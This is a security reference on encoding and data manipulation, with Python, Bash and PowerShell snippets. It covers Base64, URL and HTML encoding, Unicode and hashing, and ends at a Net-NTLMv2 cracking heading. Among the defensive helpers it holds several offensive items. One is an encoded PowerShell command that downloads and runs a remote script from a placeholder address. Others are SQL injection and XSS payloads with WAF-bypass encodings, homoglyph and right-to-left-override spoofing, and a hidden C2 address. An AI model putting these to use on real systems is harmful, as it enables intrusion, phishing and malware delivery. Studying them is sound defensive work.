Cybersecurity News & Analysis • github: defconxt • © 2026 • blacktemple.net
Encoding, Decoding & Data Manipulation — Ultimate Reference

CIPHER training material. Every section includes working code examples for Python 3.10+ and/or Bash/PowerShell. Designed for CTFs, forensics, exploit development, and red/blue team operations.


Table of Contents

  1. Base Encoding
  2. Hex Encoding
  3. URL Encoding
  4. HTML Entities
  5. Unicode
  6. Hashing
  7. XOR
  8. ROT13 / ROT47 / Caesar
  9. JWT
  10. Regular Expressions for Security
  11. Obfuscation & Deobfuscation
  12. Serialization Security
  13. Compression Security
  14. Binary & Struct Manipulation
  15. CyberChef Reference

1. Base Encoding

Base64

Standard alphabet: A-Za-z0-9+/ with = padding. URL-safe variant uses -_ instead of +/.

import base64

# --- Encode / Decode ---
plaintext = b"attack at dawn"
encoded = base64.b64encode(plaintext)          # b'YXR0YWNrIGF0IGRhd24='
decoded = base64.b64decode(encoded)            # b'attack at dawn'

# --- URL-safe Base64 (replaces + with -, / with _) ---
url_encoded = base64.urlsafe_b64encode(plaintext)   # b'YXR0YWNrIGF0IGRhd24='
url_decoded = base64.urlsafe_b64decode(url_encoded)

# --- Decode without padding (common in JWTs, cookies) ---
no_pad = b"YXR0YWNrIGF0IGRhd24"   # missing '='
decoded = base64.b64decode(no_pad + b"=" * (-len(no_pad) % 4))

# --- Detect Base64 ---
import re
def is_base64(s: str) -> bool:
    # fullmatch avoids the trailing-newline match that '$' allows; '+' rejects empty input
    pattern = r'[A-Za-z0-9+/]+={0,2}'
    return bool(re.fullmatch(pattern, s)) and len(s) % 4 == 0

# --- File encode/decode ---
with open("/etc/passwd", "rb") as f:
    encoded_file = base64.b64encode(f.read())
# Bash — encode/decode
echo -n "attack at dawn" | base64                    # YXR0YWNrIGF0IGRhd24=
echo "YXR0YWNrIGF0IGRhd24=" | base64 -d             # attack at dawn

# File encode/decode
base64 /etc/passwd > passwd.b64
base64 -d passwd.b64 > passwd_restored

# Decode without trailing newline issues
echo -n "YXR0YWNrIGF0IGRhd24=" | base64 -d
# PowerShell — encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
[Convert]::ToBase64String($bytes)                    # YXR0YWNrIGF0IGRhd24=

$decoded = [Convert]::FromBase64String("YXR0YWNrIGF0IGRhd24=")
[System.Text.Encoding]::UTF8.GetString($decoded)     # attack at dawn

# File encode
$raw = [IO.File]::ReadAllBytes("C:\Windows\System32\calc.exe")
[Convert]::ToBase64String($raw) | Out-File calc.b64

Security notes:

  • Base64 is NOT encryption. Attackers use it to bypass naive content filters.
  • Double-base64 encoding is common in obfuscated payloads.
  • Look for Base64 in HTTP headers (Authorization: Basic), cookies, POST bodies.
  • PowerShell -EncodedCommand accepts UTF-16LE Base64: powershell -enc <base64>.
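
Layered Base64 and the UTF-16LE form used by -EncodedCommand both come up when triaging payloads. The sketch below is one way to peel them. `peel_base64` and `decode_ps_encoded` are hypothetical helper names, and the "looks like Base64" test is a heuristic (alphabet, length multiple of 4, at least 8 characters) that can misfire on short alphanumeric plaintext.

```python
import base64
import binascii
import re

_B64_RE = re.compile(rb'[A-Za-z0-9+/]+={0,2}')

def peel_base64(data: bytes, max_layers: int = 10) -> tuple[bytes, int]:
    """Strip nested Base64 layers; return (innermost bytes, layers removed)."""
    layers = 0
    while layers < max_layers:
        candidate = data.strip()
        # Heuristic gate: alphabet, padding and length must all fit Base64.
        if len(candidate) < 8 or len(candidate) % 4 or not _B64_RE.fullmatch(candidate):
            break
        try:
            data = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            break
        layers += 1
    return data, layers

def decode_ps_encoded(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text)."""
    return base64.b64decode(b64).decode('utf-16-le')

double = base64.b64encode(base64.b64encode(b"attack at dawn"))
print(peel_base64(double))   # (b'attack at dawn', 2)
```

The layer count is often as useful as the decoded bytes: more than one layer is rarely produced by legitimate software.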

Base32

Alphabet: A-Z2-7 with = padding. The canonical form is uppercase; many decoders also accept lowercase (Python needs casefold=True). Used in TOTP/HOTP secrets, onion addresses.

import base64

encoded = base64.b32encode(b"attack at dawn")   # b'MF2HIYLDNMQGC5BAMRQXO3Q='
decoded = base64.b32decode(encoded)              # b'attack at dawn'

# Case insensitive decode
decoded = base64.b32decode(b"mf2hiyldnmqgc5bamrqxo3q=", casefold=True)
# Bash (requires coreutils or python)
echo -n "attack at dawn" | base32                    # MF2HIYLDNMQGC5BAMRQXO3Q=
echo "MF2HIYLDNMQGC5BAMRQXO3Q=" | base32 -d         # attack at dawn

Base58

No 0OIl characters (avoids visual ambiguity). Used in Bitcoin addresses, IPFS CIDs.

# pip install base58
import base58

encoded = base58.b58encode(b"attack at dawn")   # bytes over the Bitcoin alphabet (no 0, O, I, l)
decoded = base58.b58decode(encoded)              # b'attack at dawn'

# Base58Check (Bitcoin) — includes version byte + 4-byte checksum
encoded_check = base58.b58encode_check(b"\x00" + b"attack at dawn")

Base85 (Ascii85)

Higher density than Base64 — 4 bytes become 5 ASCII chars. Used in PDF, Git binary patches, ZeroMQ.

import base64

# Ascii85 (Adobe variant)
encoded = base64.a85encode(b"attack at dawn")    # 18 ASCII chars for 14 input bytes
decoded = base64.a85decode(encoded)

# Base85 (RFC 1924 / Git variant)
encoded = base64.b85encode(b"attack at dawn")    # also 18 chars, but a different alphabet
decoded = base64.b85decode(encoded)
# Bash — using Python one-liner
echo -n "attack at dawn" | python3 -c "import sys,base64; print(base64.b85encode(sys.stdin.buffer.read()).decode())"

Base encoding detection heuristics

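| Encoding | Alphabet | Padding | Length multiple |
|----------|----------|---------|-----------------|
| Base64 | A-Za-z0-9+/ | = (0-2) | 4 |
| Base64url | A-Za-z0-9-_ | = or none | 4 when padded |
| Base32 | A-Z2-7 | = (0, 1, 3, 4 or 6) | 8 |
| Base58 | 123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz | None | Variable |
| Base85 (Ascii85) | !-u (ASCII 33-117) | None | 5 chars per 4 bytes |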
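
The table can be turned into a rough classifier. This is a sketch, not a definitive detector: `guess_base_encoding` is a hypothetical name, the patterns are assumptions derived from the alphabets above (plus plain hex), and because the alphabets nest, one string often matches several encodings. Candidates are returned from the most restrictive alphabet to the least.

```python
import re

# Ordered from most to least restrictive alphabet, because the alphabets nest.
_PATTERNS = [
    ("hex", re.compile(r'(?:[0-9a-fA-F]{2})+')),
    ("base32", re.compile(
        r'(?:[A-Z2-7]{8})*'
        r'(?:[A-Z2-7]{2}={6}|[A-Z2-7]{4}={4}|[A-Z2-7]{5}={3}|[A-Z2-7]{7}=)?')),
    ("base58", re.compile(r'[1-9A-HJ-NP-Za-km-z]+')),
    ("base64", re.compile(
        r'(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?')),
    ("base64url", re.compile(r'[A-Za-z0-9_-]+={0,2}')),
]

def guess_base_encoding(s: str) -> list[str]:
    """Return every encoding whose alphabet and padding rules fit the string."""
    s = s.strip()
    if not s:
        return []
    return [name for name, pattern in _PATTERNS if pattern.fullmatch(s)]

print(guess_base_encoding("YXR0YWNrIGF0IGRhd24="))      # ['base64', 'base64url']
print(guess_base_encoding("MF2HIYLDNMQGC5BAMRQXO3Q="))  # base32 listed first
```

Treat the result as a list of things to try. Only a successful decode that yields plausible data confirms the guess.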

2. Hex Encoding

Hex to/from ASCII

# --- ASCII to Hex ---
text = "attack at dawn"
hex_str = text.encode().hex()                        # '61747461636b206174206461776e'
hex_spaced = ' '.join(f'{b:02x}' for b in text.encode())  # '61 74 74 61 63 6b ...'

# --- Hex to ASCII ---
recovered = bytes.fromhex('61747461636b206174206461776e').decode()  # 'attack at dawn'

# --- Hex to ASCII ignoring whitespace ---
dirty_hex = "61 74 74 61\n63 6b"
clean = bytes.fromhex(dirty_hex.replace(' ', '').replace('\n', ''))

# --- Hexdump (hexdump -C style, no extra imports needed) ---
data = b"\x7fELF\x02\x01\x01\x00"
for i in range(0, len(data), 16):
    chunk = data[i:i+16]
    hex_part = ' '.join(f'{b:02x}' for b in chunk)
    ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
    print(f'{i:08x}  {hex_part:<48}  |{ascii_part}|')
# Bash: ASCII to hex
echo -n "attack at dawn" | xxd -p                     # 61747461636b206174206461776e
echo -n "attack at dawn" | od -A x -t x1z -v

# Hex to ASCII
echo "61747461636b206174206461776e" | xxd -r -p        # attack at dawn

# Hexdump a binary
xxd /bin/ls | head -20
hexdump -C /bin/ls | head -20
# PowerShell — hex encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
($bytes | ForEach-Object { '{0:x2}' -f $_ }) -join ''

# Hex to bytes
$hex = "61747461636b206174206461776e"
$bytes = for ($i = 0; $i -lt $hex.Length; $i += 2) {
    [Convert]::ToByte($hex.Substring($i, 2), 16)
}
[System.Text.Encoding]::UTF8.GetString($bytes)

Hex to/from Binary and Decimal

# Hex <-> Decimal
hex_val = "deadbeef"
decimal = int(hex_val, 16)              # 3735928559
back_to_hex = hex(decimal)              # '0xdeadbeef'

# Hex <-> Binary
binary = bin(int("ff", 16))             # '0b11111111'
hex_from_bin = hex(int("11111111", 2))  # '0xff'

# IP address: dotted decimal <-> hex
import ipaddress
ip = ipaddress.IPv4Address("192.168.1.1")
hex_ip = format(int(ip), '08x')         # 'c0a80101'
ip_back = ipaddress.IPv4Address(int(hex_ip, 16))  # 192.168.1.1

# Useful for shellcode: \x escape format
shellcode_hex = "6a0258994889d74831f60f05"
shellcode_escaped = ''.join(f'\\x{shellcode_hex[i:i+2]}' for i in range(0, len(shellcode_hex), 2))
# '\\x6a\\x02\\x58\\x99\\x48\\x89\\xd7\\x48\\x31\\xf6\\x0f\\x05'

shellcode_bytes = bytes.fromhex(shellcode_hex)
# Bash: decimal to hex
printf '%x\n' 3735928559                # deadbeef

# Hex to decimal
echo $((16#deadbeef))                   # 3735928559
printf '%d\n' 0xdeadbeef               # 3735928559

# Binary to hex
echo "obase=16;ibase=2;11011110101011011011111011101111" | bc  # DEADBEEF

3. URL Encoding

Single encoding

from urllib.parse import quote, unquote, quote_plus, unquote_plus

# Standard percent-encoding (space -> %20)
encoded = quote("admin' OR 1=1--")           # "admin%27%20OR%201%3D1--"
decoded = unquote("admin%27%20OR%201%3D1--")  # "admin' OR 1=1--"

# Plus-encoding (space -> +, used in form data)
encoded = quote_plus("search term here")     # "search+term+here"
decoded = unquote_plus("search+term+here")   # "search term here"

# safe='' also encodes '/'; letters, digits and _.-~ are never percent-encoded by quote()
fully_encoded = quote("test", safe='')        # 'test' (unreserved characters stay as-is)
fully_encoded = quote("/path/file", safe='')  # '%2Fpath%2Ffile'

Double encoding (WAF bypass)

from urllib.parse import quote

payload = "' OR 1=1--"
single = quote(payload, safe='')        # %27%20OR%201%3D1--
double = quote(single, safe='')         # %2527%2520OR%25201%253D1--

# Server that decodes twice will see the original payload
# First decode:  %27%20OR%201%3D1--
# Second decode: ' OR 1=1--

# Triple encoding (rare, but seen in nested proxies)
triple = quote(quote(quote(payload, safe=''), safe=''), safe='')

Unicode URL encoding

from urllib.parse import quote

# UTF-8 URL encoding of Unicode characters
encoded = quote("file:///../etc/passwd")            # standard
encoded = quote("\u2025")                            # %E2%80%A5 (two-dot leader)
# Some parsers normalize \u2025 to ".." -> path traversal

# IRI to URI conversion
iri = "https://example.com/path/\u00e9"              # e-acute
uri = quote(iri, safe=':/@')                         # https://example.com/path/%C3%A9

# Overlong UTF-8 encoding (historic bypass, CVE-2000-0884 IIS)
# Normal '/' = 0x2F = %2F
# Overlong 2-byte: 0xC0 0xAF = %C0%AF
# Overlong 3-byte: 0xE0 0x80 0xAF = %E0%80%AF
# Modern parsers reject these, but legacy systems may not
# Bash — URL encode
python3 -c "from urllib.parse import quote; print(quote(\"admin' OR 1=1--\", safe=''))"

# URL encode with curl
curl -G --data-urlencode "q=admin' OR 1=1--" http://example.com/search

# URL decode
python3 -c "from urllib.parse import unquote; print(unquote('%27%20OR%201%3D1--'))"
# PowerShell
[System.Uri]::EscapeDataString("admin' OR 1=1--")
[System.Uri]::UnescapeDataString("%27%20OR%201%3D1--")

# .NET HttpUtility (requires System.Web)
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::UrlEncode("admin' OR 1=1--")
[System.Web.HttpUtility]::UrlDecode("%27+OR+1%3D1--")

Security notes:

  • Double encoding bypasses WAFs that decode only once before rule matching.
  • %00 (null byte) truncates strings in C-based parsers — file.php%00.jpg may bypass extension checks.
  • %0d%0a = CRLF injection in HTTP headers.
  • Path normalization differences between proxy and backend enable smuggling.

4. HTML Entities

Named entities

import html

# Encode: &, < and > always; " and ' as well, because quote=True is the default
encoded = html.escape('<script>alert("XSS")</script>')
# '&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;'

# Single quotes become &#x27; (pass quote=False to leave " and ' untouched)
encoded = html.escape("it's <dangerous>", quote=True)
# 'it&#x27;s &lt;dangerous&gt;'

# Decode
decoded = html.unescape('&lt;script&gt;alert(1)&lt;/script&gt;')
# '<script>alert(1)</script>'
decoded = html.unescape('&amp;lt;')  # '&lt;'  — only one layer decoded

Numeric (decimal) entities

# Character to decimal entity
char = '<'
entity = f'&#{ord(char)};'             # '&#60;'

# String to all-decimal-entities (XSS obfuscation)
payload = '<script>alert(1)</script>'
obfuscated = ''.join(f'&#{ord(c)};' for c in payload)
# '&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;...'

# Decode
import html
decoded = html.unescape('&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;')
# '<script>'

Hex entities

# Character to hex entity
char = '<'
entity = f'&#x{ord(char):x};'          # '&#x3c;'

# String to all-hex-entities
payload = '<img src=x onerror=alert(1)>'
obfuscated = ''.join(f'&#x{ord(c):x};' for c in payload)
# '&#x3c;&#x69;&#x6d;&#x67;...'

# Mixed encoding (harder for filters)
# &#60;script&#x3e;alert&#40;1&#41;&#60;/script&#x3e;

# Decode all forms
import html
html.unescape('&#x3c;&#60;&lt;')       # '<<<'
# Bash — decode HTML entities
python3 -c "import html; print(html.unescape('&lt;script&gt;'))"

# Encode
python3 -c "import html; print(html.escape('<script>alert(1)</script>'))"

Security notes:

  • Browsers decode HTML entities in attribute values before acting on them, so <a href="&#106;avascript:alert(1)"> still runs as a javascript: URL.
  • Entity encoding without semicolons works in some browsers: &#60script parsed as <script.
  • Null bytes in entities: &#0; may bypass filters.
  • Double encoding: &amp;lt; decodes to &lt; on first pass, < on second.
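
Because the browser decodes entities before it interprets an attribute, a scheme check has to run on the decoded value. The following is a minimal sketch under that assumption; `is_dangerous_href` and the blocked-scheme set are illustrative choices, not a complete sanitizer.

```python
import html

BLOCKED_SCHEMES = {"javascript", "data", "vbscript"}   # illustrative, not exhaustive
_LEADING_JUNK = ''.join(chr(c) for c in range(0x21))   # C0 controls and space

def is_dangerous_href(raw_attr: str) -> bool:
    """Check the URL scheme after entity decoding, roughly as a browser would see it."""
    decoded = html.unescape(raw_attr)
    # Browsers drop tab, CR and LF inside URLs and ignore leading control characters.
    cleaned = ''.join(ch for ch in decoded if ch not in '\t\r\n').lstrip(_LEADING_JUNK)
    scheme = cleaned.partition(':')[0].strip().lower() if ':' in cleaned else ''
    return scheme in BLOCKED_SCHEMES

print(is_dangerous_href("&#106;avascript:alert(1)"))   # True
print(is_dangerous_href("https://example.com/"))       # False
```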

Quick reference table

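| Character | Named | Decimal | Hex |
|-----------|-------|---------|-----|
| < | &lt; | &#60; | &#x3c; |
| > | &gt; | &#62; | &#x3e; |
| & | &amp; | &#38; | &#x26; |
| " | &quot; | &#34; | &#x22; |
| ' | &apos; | &#39; | &#x27; |
| / | (none) | &#47; | &#x2f; |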

5. Unicode

UTF-8 encoding internals

# UTF-8 byte representation
text = "cafe\u0301"     # 'cafe' + U+0301 combining acute accent (renders as "café")
utf8_bytes = text.encode('utf-8')
print(utf8_bytes.hex())  # 63616665cc81

# Character byte length in UTF-8
for char in ['A', '\u00e9', '\u4e16', '\U0001f600']:
    encoded = char.encode('utf-8')
    print(f"U+{ord(char):04X}  {char!r:>10}  {len(encoded)} bytes  {encoded.hex()}")
# U+0041         'A'  1 bytes  41
# U+00E9         'é'  2 bytes  c3a9
# U+4E16         '世'  3 bytes  e4b896
# U+1F600         '😀'  4 bytes  f09f9880

# UTF-8 byte ranges
# 0xxxxxxx             -> 1 byte  (U+0000 to U+007F)
# 110xxxxx 10xxxxxx     -> 2 bytes (U+0080 to U+07FF)
# 1110xxxx 10xxxxxx 10xxxxxx  -> 3 bytes (U+0800 to U+FFFF)
# 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx -> 4 bytes (U+10000 to U+10FFFF)
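
The bit layouts above can be applied by hand, which also shows where overlong forms come from. This is a teaching sketch: `utf8_encode_codepoint`, `overlong_2byte` and `is_valid_utf8` are hypothetical names, and surrogate code points are not rejected the way a real encoder would.

```python
def utf8_encode_codepoint(cp: int) -> bytes:
    """Encode one code point using the shortest UTF-8 form."""
    if cp < 0x80:
        return bytes([cp])
    if cp < 0x800:
        return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])
    if cp < 0x10000:
        return bytes([0xE0 | (cp >> 12), 0x80 | ((cp >> 6) & 0x3F), 0x80 | (cp & 0x3F)])
    if cp <= 0x10FFFF:
        return bytes([0xF0 | (cp >> 18), 0x80 | ((cp >> 12) & 0x3F),
                      0x80 | ((cp >> 6) & 0x3F), 0x80 | (cp & 0x3F)])
    raise ValueError("code point out of range")

def overlong_2byte(cp: int) -> bytes:
    """Build the invalid 2-byte overlong form of an ASCII code point."""
    if cp >= 0x80:
        raise ValueError("only ASCII has a 2-byte overlong form")
    return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])

def is_valid_utf8(data: bytes) -> bool:
    try:
        data.decode('utf-8')      # Python's decoder is strict and rejects overlong forms
        return True
    except UnicodeDecodeError:
        return False

print(utf8_encode_codepoint(0x4E16).hex())   # e4b896
print(overlong_2byte(0x2F).hex())            # c0af
print(is_valid_utf8(overlong_2byte(0x2F)))   # False
```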

UTF-16 encoding

# UTF-16LE is the standard for Windows internals and PowerShell -EncodedCommand
text = "calc.exe"
utf16le = text.encode('utf-16-le')
print(utf16le.hex())    # 630061006c0063002e00650078006500

# Decode
decoded = utf16le.decode('utf-16-le')  # 'calc.exe'

# PowerShell encoded command preparation
import base64
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"
encoded_cmd = base64.b64encode(cmd.encode('utf-16-le')).decode()
# Use as: powershell -enc <encoded_cmd>

# UTF-16 BOM detection
data = b'\xff\xfe\x41\x00'   # UTF-16-LE BOM + 'A'
data = b'\xfe\xff\x00\x41'   # UTF-16-BE BOM + 'A'

Punycode (IDN homograph attacks)

# Punycode encodes Unicode domain names for DNS
domain = "example.com"
evil_domain = "\u0435xample.com"   # Cyrillic 'e' (U+0435) instead of Latin 'e'

# Encode to punycode (ACE form)
punycode = evil_domain.encode('idna')   # b'xn--xample-9uf.com'

# Decode punycode
decoded = b'xn--xample-9uf.com'.decode('idna')  # looks like 'example.com'

# Detect homographs
def has_mixed_scripts(domain: str) -> bool:
    import unicodedata
    scripts = set()
    for char in domain:
        if char in '.-':
            continue
        cat = unicodedata.category(char)
        if cat.startswith('L'):
            # Rough script detection via name
            name = unicodedata.name(char, '')
            if 'CYRILLIC' in name:
                scripts.add('cyrillic')
            elif 'LATIN' in name:
                scripts.add('latin')
            elif 'GREEK' in name:
                scripts.add('greek')
    return len(scripts) > 1

print(has_mixed_scripts("\u0435xample.com"))  # True — mixed Cyrillic + Latin
# Bash — punycode conversion
python3 -c "print('\u0435xample.com'.encode('idna'))"

# Using idn command (libidn)
echo "xn--xample-9uf.com" | idn --idna-to-unicode 2>/dev/null

Homoglyph attacks

# Characters that look identical but have different codepoints
homoglyphs = {
    'a': ['\u0430'],              # Cyrillic а
    'e': ['\u0435'],              # Cyrillic е
    'o': ['\u043e', '\u03bf'],    # Cyrillic о, Greek ο (omicron)
    'p': ['\u0440'],              # Cyrillic р
    'c': ['\u0441'],              # Cyrillic с
    'x': ['\u0445'],              # Cyrillic х
    'H': ['\u041d'],              # Cyrillic Н
    'T': ['\u0422'],              # Cyrillic Т
    'B': ['\u0412'],              # Cyrillic В
    'A': ['\u0391'],              # Greek Α
    'l': ['\u04cf', '\u0049'],    # Cyrillic palochka, Latin I
    '0': ['\u041e'],              # Cyrillic О
    '/': ['\u2044', '\u2215'],    # Fraction slash, Division slash
}

# Generate confusable version of a URL
def generate_confusable(url: str) -> str:
    import random
    result = []
    for char in url:
        if char in homoglyphs and random.random() > 0.5:
            result.append(random.choice(homoglyphs[char]))
        else:
            result.append(char)
    return ''.join(result)

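# Detection: normalize and compare. NFKC only folds compatibility forms (fullwidth,
# ligatures and similar); it does not map Cyrillic or Greek lookalikes to Latin, so
# cross-script homoglyphs need a confusables table (Unicode UTS #39).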
import unicodedata
def confusable_check(s1: str, s2: str) -> bool:
    n1 = unicodedata.normalize('NFKC', s1).lower()
    n2 = unicodedata.normalize('NFKC', s2).lower()
    return n1 == n2 and s1 != s2
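
Cross-script lookalikes can be caught by mapping each character to a common "skeleton" before comparing. The sketch below uses a tiny hand-written map for illustration; `CONFUSABLE_TO_LATIN`, `skeleton` and `looks_like` are hypothetical names, and a real check would load the full Unicode confusables data instead.

```python
import unicodedata

# Illustrative subset only; not the Unicode confusables table.
CONFUSABLE_TO_LATIN = {
    '\u0430': 'a', '\u0435': 'e', '\u043e': 'o', '\u0440': 'p',
    '\u0441': 'c', '\u0445': 'x', '\u03bf': 'o', '\u0391': 'A',
}

def skeleton(s: str) -> str:
    """NFKC-normalize, then replace known lookalikes with their Latin twin."""
    normalized = unicodedata.normalize('NFKC', s)
    return ''.join(CONFUSABLE_TO_LATIN.get(ch, ch) for ch in normalized)

def looks_like(candidate: str, trusted: str) -> bool:
    """True when candidate differs from trusted but has the same skeleton."""
    return candidate != trusted and skeleton(candidate) == skeleton(trusted)

print(looks_like("\u0435xample.com", "example.com"))   # True
print(looks_like("example.com", "example.com"))        # False
```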

Zero-width characters (steganography / watermarking)

# Zero-width characters are invisible but present in text
ZWSP = '\u200b'    # Zero-Width Space
ZWNJ = '\u200c'    # Zero-Width Non-Joiner
ZWJ  = '\u200d'    # Zero-Width Joiner
ZWNS = '\ufeff'    # Zero-Width No-Break Space (BOM)

# Encode binary data in zero-width characters
def zw_encode(secret: str) -> str:
    """Encode secret as zero-width characters between visible text."""
    bits = ''.join(f'{b:08b}' for b in secret.encode())
    zw_str = ''
    for bit in bits:
        zw_str += ZWJ if bit == '1' else ZWSP
    return zw_str

def zw_decode(text: str) -> str:
    """Extract zero-width encoded secret from text."""
    bits = ''
    for char in text:
        if char == ZWJ:
            bits += '1'
        elif char == ZWSP:
            bits += '0'
    byte_list = [int(bits[i:i+8], 2) for i in range(0, len(bits) - len(bits) % 8, 8)]
    return bytes(byte_list).decode('utf-8', errors='ignore')

# Embed in innocent text
visible = "Nothing to see here"
hidden = zw_encode("C2:10.0.0.1")
watermarked = visible[:7] + hidden + visible[7:]
# Looks like "Nothing to see here" but contains hidden data

# Detect zero-width characters
def detect_zw(text: str) -> list[tuple[int, str, str]]:
    zw_chars = {'\u200b': 'ZWSP', '\u200c': 'ZWNJ', '\u200d': 'ZWJ',
                '\ufeff': 'BOM', '\u200e': 'LRM', '\u200f': 'RLM',
                '\u2060': 'WJ', '\u2061': 'FA', '\u2062': 'IT', '\u2063': 'IS'}
    found = []
    for i, char in enumerate(text):
        if char in zw_chars:
            found.append((i, f'U+{ord(char):04X}', zw_chars[char]))
    return found

# Strip zero-width characters
import re
def strip_zw(text: str) -> str:
    return re.sub(r'[\u200b-\u200f\u2060-\u2064\ufeff]', '', text)

Unicode normalization attacks

import unicodedata

# NFC, NFD, NFKC, NFKD normalization forms
# Exploitable when filter checks one form but app uses another

s = "file\u0000.txt"          # null byte injection
s = "\uff0e\uff0e/etc/passwd" # fullwidth dots '..' -> path traversal after NFKC

# NFKC normalizes fullwidth to ASCII
print(unicodedata.normalize('NFKC', '\uff0e\uff0e'))  # '..'
print(unicodedata.normalize('NFKC', '\uff1c'))         # '<'
print(unicodedata.normalize('NFKC', '\uff1e'))         # '>'

# Bypass WAF example:
# WAF blocks: <script>
# Send: \uff1cscript\uff1e   (fullwidth < and >)
# Backend normalizes NFKC: <script>  -> XSS

# Right-to-Left Override attack (file extension spoofing)
filename = "invoice\u202egnp.exe"
# Displays as: invoiceexe.png  (appears to be PNG)
# Actual file: invoice[RLO]gnp.exe  (is actually .exe)
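
Both tricks above can be flagged before a filename reaches a user or a path check. A minimal audit sketch; `audit_filename` and the returned dictionary layout are assumptions made for illustration.

```python
import unicodedata

BIDI_CONTROLS = {
    '\u202a': 'LRE', '\u202b': 'RLE', '\u202c': 'PDF', '\u202d': 'LRO', '\u202e': 'RLO',
    '\u2066': 'LRI', '\u2067': 'RLI', '\u2068': 'FSI', '\u2069': 'PDI',
}

def audit_filename(name: str) -> dict:
    """Report bidi control characters and any change NFKC normalization would make."""
    normalized = unicodedata.normalize('NFKC', name)
    return {
        'bidi_controls': [(i, BIDI_CONTROLS[ch]) for i, ch in enumerate(name)
                          if ch in BIDI_CONTROLS],
        'changed_by_nfkc': normalized != name,
        'normalized': normalized,
        # Extension as the OS sees it: text after the last '.' in the raw string.
        'real_extension': name.rsplit('.', 1)[-1] if '.' in name else '',
    }

report = audit_filename("invoice\u202egnp.exe")
print(report['bidi_controls'], report['real_extension'])   # [(7, 'RLO')] exe
```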

6. Hashing

MD5 (128-bit, BROKEN for collision resistance)

import hashlib

# String hash
md5 = hashlib.md5(b"password").hexdigest()
# '5f4dcc3b5aa765d61d8327deb882cf99'

# File hash
def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b''):
            h.update(chunk)
    return h.hexdigest()
# Bash
echo -n "password" | md5sum                       # 5f4dcc3b5aa765d61d8327deb882cf99
md5sum /etc/passwd                                 # file hash
# PowerShell
$md5 = [System.Security.Cryptography.MD5]::Create()
$bytes = [System.Text.Encoding]::UTF8.GetBytes("password")
[BitConverter]::ToString($md5.ComputeHash($bytes)).Replace("-","").ToLower()

Get-FileHash -Algorithm MD5 C:\Windows\System32\calc.exe

SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)

sha1 = hashlib.sha1(b"password").hexdigest()
# '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'
# Bash
echo -n "password" | sha1sum
sha1sum /bin/ls

SHA-256 (256-bit, current standard)

sha256 = hashlib.sha256(b"password").hexdigest()
# '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8'

# HMAC-SHA256
import hmac
sig = hmac.new(b"secret_key", b"message", hashlib.sha256).hexdigest()
# Bash
echo -n "password" | sha256sum
sha256sum /bin/ls
openssl dgst -sha256 /bin/ls

# HMAC
echo -n "message" | openssl dgst -sha256 -hmac "secret_key"
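
Computing an HMAC is half the job; the check on the receiving side should compare tags in constant time. A short sketch, with `sign_message` and `verify_message` as hypothetical helper names:

```python
import hashlib
import hmac

def sign_message(key: bytes, message: bytes) -> str:
    """Return the HMAC-SHA256 tag of message as a hex string."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()

def verify_message(key: bytes, message: bytes, tag_hex: str) -> bool:
    """Recompute the tag and compare without leaking timing information."""
    expected = sign_message(key, message)
    return hmac.compare_digest(expected, tag_hex)

tag = sign_message(b"secret_key", b"message")
print(verify_message(b"secret_key", b"message", tag))    # True
print(verify_message(b"secret_key", b"tampered", tag))   # False
```

Using `==` on the two strings would also work functionally, but its early exit on the first differing character can leak how much of a forged tag is correct.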

SHA-512 (512-bit)

sha512 = hashlib.sha512(b"password").hexdigest()
# 'b109f3bbbc244eb82441917ed06d618b9008dd09...'
# Bash
echo -n "password" | sha512sum

NTLM (Windows password hash)

import hashlib

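def ntlm_hash(password: str) -> str:
    """Compute NTLM hash (MD4 of UTF-16LE password).

    hashlib.new('md4') raises ValueError when the linked OpenSSL build does not
    expose MD4 (OpenSSL 3.x ships it only in the legacy provider).
    """
    return hashlib.new('md4', password.encode('utf-16-le')).hexdigest()

print(ntlm_hash("password"))
# '8846f7eaee8fb117ad06bdd830b7586c'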

# LM hash (legacy, DES-based, extremely weak)
# Splits password into two 7-char halves, uppercases, DES encrypts "KGS!@#$%"
# Not shown — do not use LM in any modern system
# Bash: NTLM hash with a Python one-liner
python3 -c "import hashlib; print(hashlib.new('md4', 'Password1'.encode('utf-16-le')).hexdigest())"

# Using openssl (if md4 available)
echo -n "Password1" | iconv -t utf-16le | openssl dgst -md4 2>/dev/null

Net-NTLMv2 (challenge-response, captured on the wire)

import hashlib
import hmac
import os

def compute_ntlmv2_response(password: str, user: str, domain: str,
                             server_challenge: bytes, client_challenge: bytes | None = None) -> str:
    """Compute Net-NTLMv2 response (simplified)."""
    if client_challenge is None:
        client_challenge = os.urandom(8)

    # Step 1: NTLM hash
    nt_hash = hashlib.new('md4', password.encode('utf-16-le')).digest()

    # Step 2: NTLMv2 hash = HMAC-MD5(NT_hash, uppercase(user) + domain)
    identity = (user.upper() + domain).encode('utf-16-le')
    ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()

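    # Step 3: NTLMv2 response = HMAC-MD5(NTLMv2_hash, server_challenge + blob)
    # A real blob also carries a timestamp and target info; here it is reduced to
    # the client challenge, so `blob` below holds server_challenge + client_challenge.
    blob = server_challenge + client_challenge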
    ntlmv2_response = hmac.new(ntlmv2_hash, blob, hashlib.md5).hexdigest()

    return ntlmv2_response

# Hashcat format for cracking Net-NTLMv2:
